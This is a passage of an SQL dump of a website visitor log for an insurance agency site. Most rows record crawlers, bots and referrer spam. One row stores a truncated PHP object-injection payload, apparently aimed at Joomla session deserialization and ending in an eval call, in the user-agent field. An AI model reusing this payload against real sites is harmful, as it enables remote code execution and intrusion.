OS','','','','','BingBot','','','','0','0',0),(20546,'0b_71b9eb98fb873c0876e81e5a9765baf1','1461436017','192.187.114.11','push-router.cakestandchar.net','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:119:\\\"eval(chr(112).chr(1','','',0,'','','','','','Feed Reader','feed reader','','','0','0',0),(20547,'0b_5e3115dc6bb503cc5fb093eb6639950c','1461441054','66.249.66.18','crawl-66-249-66-18.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20549,'0b_166a72c8a96cdadbc0bb2bacf5e2c717','1461441762','136.243.67.139','static.139.67.243.136.clients.your-server.de','/','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0','','',0,'Win7','Firefox 24','de','','','','','','','0','0',0),(20550,'0b_03770a1cb9279cf5b4ab694af8015538','1461441763','136.243.67.139','static.139.67.243.136.clients.your-server.de','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; InfoPath.3; AskTbORJ/5.15.15.36191; .NET4.0C)','','',0,'Win7 x64','IE 10','de','','','','','','','0','0',0),(20553,'0b_03770a1cb9279cf5b4ab694af8015538','1461441764','136.243.67.139','static.139.67.243.136.clients.your-server.de','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; InfoPath.3; AskTbORJ/5.15.15.36191; .NET4.0C)','http://www.empireins.com/','',0,'Win7 x64','IE 10','de','','','','','','','0','0',0),(20555,'0b_7fa1ff4cdd9b6fe1d8f7a82b81c85602','1461443550','45.33.36.127','li986-127.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(20558,'0b_63a6cc59d7a8fa4c63a78495b022bef5','1461446858','40.77.167.72','msnbot-40-77-167-72.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20559,'0b_d9f0735cf5308f3dce38bd5e0332da2b','1461450743','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20561,'0b_5aad0b264371245e688a28055e7895f2','1461450780','199.30.24.44','msnbot-199-30-24-44.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(20562,'0b_3c4e117ac7e8e013cc1ca662d68de995','1461456196','66.249.66.8','crawl-66-249-66-8.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20564,'0b_208d60dc25b4704581fc0c23934835df','1461456196','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(20567,'0b_21ef3f6be49aa4c8220d3ab4f49437c5','1461456971','157.55.39.231','msnbot-157-55-39-231.search.msn.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20568,'0b_02e947a19316c664229986271fdf3738','1461457917','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20570,'0b_ab0416f24a12f0d67a6d4627eefc5015','1461458446','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20571,'0b_617089892b2cbff0471c77287096f346','1461459881','207.46.13.115','msnbot-207-46-13-115.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20573,'0b_0439c35d73802d3b76d31c93040c5a6c','1461461510','40.77.167.72','msnbot-40-77-167-72.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20576,'0b_27a237fd67de8fe18f8c92656f3ced15','1461461522','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)','http://coop-gamers.ru/','',0,'WinXP','Netscape 3','ua','','','','','','','0','0',0),(20579,'0b_15f0e2a0060e4944668e301b3f51c048','1461461522','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)','http://cool-wedding.net/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(20582,'0b_0439c35d73802d3b76d31c93040c5a6c','1461461954','40.77.167.51','msnbot-40-77-167-51.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20585,'0b_0439c35d73802d3b76d31c93040c5a6c','1461462126','40.77.167.51','msnbot-40-77-167-51.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20588,'0b_0439c35d73802d3b76d31c93040c5a6c','1461462272','40.77.167.51','msnbot-40-77-167-51.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20589,'0b_0439c35d73802d3b76d31c93040c5a6c','1461462509','40.77.167.51','msnbot-40-77-167-51.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20591,'0b_5f8e637a150e7a02c2cc2774fbedad05','1461462542','66.249.66.18','crawl-66-249-66-18.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20592,'0b_53ebe73bfe45dbc29750d6b724f19721','1461467955','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://gazoblok-gazobeton.com.ua/','',0,'WinXP','Crazy Browser 2','','','','','','','','0','0',0),(20594,'0b_021841b2a1bcdc853745d036059b543d','1461467955','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1','http://carsnumber.com/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(20595,'0b_485ea84c7544621194bc212bb0c00acd','1461470721','54.145.149.12','ec2-54-145-149-12.compute-1.amazonaws.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(20597,'0b_485ea84c7544621194bc212bb0c00acd','1461470723','54.145.149.12','ec2-54-145-149-12.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','http://www.empireins.com/','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(20600,'0b_55b953998943a3132f5554b61cf45307','1461470725','54.145.149.12','ec2-54-145-149-12.compute-1.amazonaws.com','/robots.txt','Python-urllib/1.17','','',0,'','','','','','Python-urllib','','','','0','0',0),(20601,'0b_485ea84c7544621194bc212bb0c00acd','1461470726','54.145.149.12','ec2-54-145-149-12.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(20604,'0b_485ea84c7544621194bc212bb0c00acd','1461470727','54.145.149.12','ec2-54-145-149-12.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(20606,'0b_6dcebfe07aa9ce4fdb1bf9824fd5381b','1461470800','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20607,'0b_3fb5e19c20df799bb7197b1cc3881330','1461475639','207.46.13.160','msnbot-207-46-13-160.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20609,'0b_078c5ecd28f3a9e4c204862585d6191a','1461476021','207.46.13.160','msnbot-207-46-13-160.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20612,'0b_fb9a0c9a1ada8b6f87c9a48a4ae2fc24','1461476612','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)','http://forumsisadmina.ru/','',0,'WinXP','AOL 9','','','','','','','','0','0',0),(20613,'0b_fb9a0c9a1ada8b6f87c9a48a4ae2fc24','1461476612','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)','http://pornoblood.com/','',0,'WinXP','AOL 9','','','','','','','','0','0',0),(20615,'0b_a6fc66e041218438b94e9b0b436189d4','1461478569','207.46.13.73','msnbot-207-46-13-73.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20618,'0b_a6fc66e041218438b94e9b0b436189d4','1461478583','207.46.13.73','msnbot-207-46-13-73.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20619,'0b_73158956dcbdd1566effe74f44801f42','1461479263','207.46.13.160','msnbot-207-46-13-160.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20622,'0b_177f6fba98083ac848f51d12e771b22d','1461479286','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(20625,'0b_177f6fba98083ac848f51d12e771b22d','1461479291','100.43.81.146','spider-100-43-81-146.yandex.com','/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20627,'0b_1c713adbaeaeac0c1409151a6d7d735d','1461479872','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20630,'0b_64692c360a66c27303e14144b2528942','1461480918','192.187.104.235','192.187.104.235','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(20631,'0b_64692c360a66c27303e14144b2528942','1461480930','192.187.104.235','192.187.104.235','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20633,'0b_64692c360a66c27303e14144b2528942','1461480943','192.187.104.235','192.187.104.235','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20636,'0b_64692c360a66c27303e14144b2528942','1461480954','192.187.104.235','192.187.104.235','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20639,'0b_64692c360a66c27303e14144b2528942','1461480965','192.187.104.235','192.187.104.235','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20642,'0b_64692c360a66c27303e14144b2528942','1461480988','192.187.104.235','192.187.104.235','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20645,'0b_64692c360a66c27303e14144b2528942','1461481011','192.187.104.235','192.187.104.235','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20646,'0b_64692c360a66c27303e14144b2528942','1461481034','192.187.104.235','192.187.104.235','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20648,'0b_64692c360a66c27303e14144b2528942','1461481046','192.187.104.235','192.187.104.235','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20651,'0b_f10f7fac22423696e2fd158197ab4618','1461481873','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20654,'0b_270fb3f14b219f50f9360e0c8e2bc03b','1461484402','180.76.15.142','baiduspider-180-76-15-142.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(20655,'0b_6ce93f1c89b1d5d4af5d3962d434b279','1461485350','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(20658,'0b_6ce93f1c89b1d5d4af5d3962d434b279','1461485361','69.30.213.202','69.30.213.202','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(20660,'0b_9acbcf10795a99501785a356c32cc00b','1461487265','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20661,'0b_cb46cd77d77a69618ae024a5a0e3508a','1461488060','123.125.71.21','baiduspider-123-125-71-21.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(20663,'0b_e643b6902ce3805264c51ff8d227fb09','1461488090','220.181.108.81','baiduspider-220-181-108-81.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','http://empireins.com/','',0,'','','us','','','Baiduspider','','','','0','0',0),(20664,'0b_2545b62ac36b3ddb70b70db263cc28bb','1461488438','45.79.81.142','li1180-142.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(20667,'0b_b4236d85b675cc502d120982aaa47d29','1461489249','62.210.148.247','mj10.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(20670,'0b_b4236d85b675cc502d120982aaa47d29','1461489252','62.210.148.247','mj10.naefmarco.ch','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(20673,'0b_b4236d85b675cc502d120982aaa47d29','1461489259','62.210.148.247','mj10.naefmarco.ch','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(20675,'0b_b4236d85b675cc502d120982aaa47d29','1461489262','62.210.148.247','mj10.naefmarco.ch','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(20678,'0b_b4236d85b675cc502d120982aaa47d29','1461489273','62.210.148.247','mj10.naefmarco.ch','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(20681,'0b_b4236d85b675cc502d120982aaa47d29','1461489275','62.210.148.247','mj10.naefmarco.ch','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(20682,'0b_6b047fe9da6dc9a3763421ca510894c3','1461489671','180.76.15.145','baiduspider-180-76-15-145.crawl.baidu.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(20685,'0b_2e418273593c98cd77f3675ec2bcdaed','1461489799','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20687,'0b_544ad80a3d7300166b1999fa1a73c21e','1461489799','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20690,'0b_2e418273593c98cd77f3675ec2bcdaed','1461490197','66.249.66.24','crawl-66-249-66-24.googlebot.com','/discl.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20693,'0b_db18eaf214cbe87cbd7191cfbe58871d','1461490323','207.46.13.115','msnbot-207-46-13-115.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20696,'0b_82d9efd4217e2864cba0c367c0735a82','1461492616','159.205.186.37','159-205-186-37.adsl.inetia.pl','/?author=1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; (R1 1.3); .NET CLR 1.1.4322)','http://empireins.com/','',0,'WinXP','IE 6','pl','','','','','','','0','0',0),(20699,'0b_a3647618fd71bd2767d25b062bfaa44a','1461493025','207.46.13.115','msnbot-207-46-13-115.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20702,'0b_a3647618fd71bd2767d25b062bfaa44a','1461493095','207.46.13.115','msnbot-207-46-13-115.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20705,'0b_9fee4a9ba9b47b20bb2feccd3529a941','1461496259','46.4.116.197','static.197.116.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20706,'0b_9fee4a9ba9b47b20bb2feccd3529a941','1461496261','46.4.116.197','static.197.116.4.46.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(20708,'0b_e0d970b3910747601f8baad807099701','1461498068','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20711,'0b_b037f9644e0119155a262a87d9045be7','1461498596','100.43.81.152','spider-100-43-81-152.yandex.com','/companylinks.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20714,'0b_c15aa6053fbfd46c9134ffc4f3214e9a','1461504754','69.142.59.146','c-69-142-59-146.hsd1.nj.comcast.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36','https://www.google.com/','_notprovided_',1,'MacOSX','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(20717,'0b_c15aa6053fbfd46c9134ffc4f3214e9a','1461504757','69.142.59.146','c-69-142-59-146.hsd1.nj.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(20720,'0b_9d5a986ab24bc4b1c505e1a7e6596079','1461505803','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(20723,'0b_498b9e8044bd0cf8764fd54c153047fd','1461507344','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(20724,'0b_fca409c5b65da5a10871b00590f254ab','1461508167','51.255.48.153','153.ip-51-255-48.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(20726,'0b_fca409c5b65da5a10871b00590f254ab','1461508170','51.255.48.153','153.ip-51-255-48.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(20727,'0b_3ea0742d49ec34a0c05614228e6f62f7','1461508261','207.46.13.11','msnbot-207-46-13-11.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20730,'0b_4da29f362267d7047fc587f49ada5f33','1461510259','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20732,'0b_4da29f362267d7047fc587f49ada5f33','1461510262','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20735,'0b_4da29f362267d7047fc587f49ada5f33','1461510270','184.154.139.23','placeholder.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20738,'0b_4da29f362267d7047fc587f49ada5f33','1461510272','184.154.139.23','placeholder.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20739,'0b_4da29f362267d7047fc587f49ada5f33','1461510274','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(20742,'0b_044dffe5617cbf083a1c364295512ed6','1461513797','100.43.91.1','spider-100-43-91-1.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20744,'0b_1bfaabb08cd6c51c735735c38359a17a','1461521101','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(20747,'0b_1bfaabb08cd6c51c735735c38359a17a','1461521109','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(20750,'0b_1bfaabb08cd6c51c735735c38359a17a','1461521189','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(20753,'0b_e47817258ced4a3193bf630dc5a50859','1461521550','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]','http://moneytop.ru/','',0,'WinXP','Opera 7','ua','','','','','','','0','0',0),(20756,'0b_e910818b8c9475920fb4c73a96f14dde','1461522941','144.76.8.132','static.132.8.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; 